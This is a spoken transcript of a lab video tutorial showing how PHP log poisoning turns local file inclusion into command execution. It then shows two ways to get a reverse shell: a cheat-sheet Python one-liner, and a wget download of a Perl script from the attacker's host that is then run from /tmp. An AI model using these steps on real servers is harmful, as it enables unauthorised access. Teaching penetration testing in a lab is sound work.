Hello and welcome to the video series of LFI and RFI. In last video we have seen when allow URL include option was set to off, we were not able to include the files remotely. But still we were able to include the files remotely. So we were able to include the files wherever we had permissions to read the files. So for example, etc passwd file was readable, etc issue file was readable, and then a log file was readable, which is access.log in case of Apache, and we were able to write the content, or we were able to write the PHP code inside that log file, and we were able to execute then the commands. Now in this video we will see how now we can take the remote access shell of that specific system. Now log into the lab again. So I'm on Kali machine. Then let me go to the browser again and let's start where we left off in the last video. I'm going to set the intercept as off. As of now we know the log file has that specific code to execute fconfig and uname, and if I start it again I can see I have this ipconfig output in the log file. Now start it again, then try to access the log file, go to burp, replace this code with the php echo shell underscore exec. So we will see command line parameter we will define as cmd, close this bracket, close this command, and then php code. So we can execute cmd. So cmd will be treated as a variable, and against this variable we can have different parameters, and then shell underscore exec will be used to execute those commands. So click on forward here. Intercept is now set to off. Now ampersand cmd is equal to ls. So let's see if I'm able to execute the commands or not. Yes, so if I have executed ls, I can see contact.html, creditcard.html, lfi.php and lfi1.php. Similarly, if you do netstat minus rn, for example, so we could see the routing information as well here. So I'm able to execute commands now. So now from local file inclusion we have reached to the remote command execution. Now we will take help of remote command execution and try to access the shell of the system. The easiest way is, for example, go to reverse shell cheat sheet, copy this Python script, go to again Kali machine, and let's say I will have a listener on 1 2 3 4. I don't need to switch on the interception, paste the command and change the IP address here, which is 192.168.100.129. Port number will be 1234. Press enter. I can see code is being executed, and if you see the CLI shell, we should see a reverse shell from that victim machine in few seconds. Let me see again, go back to the browser, code is still executing, and here we have a shell. So if you type fconfig, I can execute command, and 192.168.1.145, type id command, so I have got www-data shell. So that is one way of getting a shell, the easiest way. You can use the Python script. What else can be done? So let me do an exit here. Let me try another way how we can take a shell here. So delete this. In the in the www directory I have a perl.pl file reversal. So perl.pl has got IP address correct 192.168.100.29. Let me start the handler again. Go to the browser, type wget http colon slash slash 192.168.100.129 and get the file as perl.pl. Save the file to slash temp directory. Then chmod the file to executable permission, give executable permission. So slash temp slash perl.pl. Then again terminate the command and then use perl space slash temp slash perl.pl. Awesome. Then perfect. Let me execute this. So I have done this and let's wait. If everything is good, file can be downloaded from my Kali machine. It will be saved in slash temp directory and then the permissions will be given to that specific file, which is a read route executable, and then Perl will be used to execute the reversal. And so one thing I have made a mistake here. So reversal is on port 1234 and listener was on 443, so it is 1234. Go back to the browser again and try again. Let's wait and we should see a reversal in a moment. Type ID, no, nothing yet. So we can verify this. So for example, go to browser. So we can see the content in temp directory. Let's see. No. Go back to. We do not have shell here now. Okay, let me try that again. So let me start the listener and go to browser. Okay, so I want to see I'm in, for example, pwd directory. or ls. Okay, so what we can do here is, I feel I'm not able to execute the commands now, so, because I don't see the output. So let's say fconfig, and do we have, no, so we have some output here. So to verify this, cat etc slash passwd. So do we see? Yes, so we have a content here in this section. Perfect. So ls slash temp. So we need to see if we have that perl dot pl file. So there are so much logs, it is difficult to identify now. But let's see, let's do a control F, try to search perl. Here we have one log entry that we are trying to get perl.pl. We are trying to save that to slash temp, and I have have got the mistake now. So we didn't specify what file name it will be. So wget http 192.168.100.129/perl.pl. Then output file will be /temp/perl.pl. So last time we didn't specify this. Then terminate the command, change permission now this time /temp/perl.pl. Again terminate command and use perl command to execute the file perl.pl. So let me verify it again. So we are doing a wget here. Out file will be saved under temp perl.pl, permissions will be modified, and then it will be executed. Let me verify we have listener set up, and then enter. So let's wait. So we should see a connection back from victim machine to the Kali machine if the command is okay, and now we should see. Let's wait for a few more seconds, and here we have a shell. So last time we did a mistake, we didn't specify what will be the file name under temp directory, so that was the reason we were not able to get the shell. Now if you execute ifconfig, we have 192.168.100.145 IP, and then ID says we have got an access of www-data user. So that's all for this video. Thank you for watching these videos, and I hope you are enjoying this video series at Troika Systems.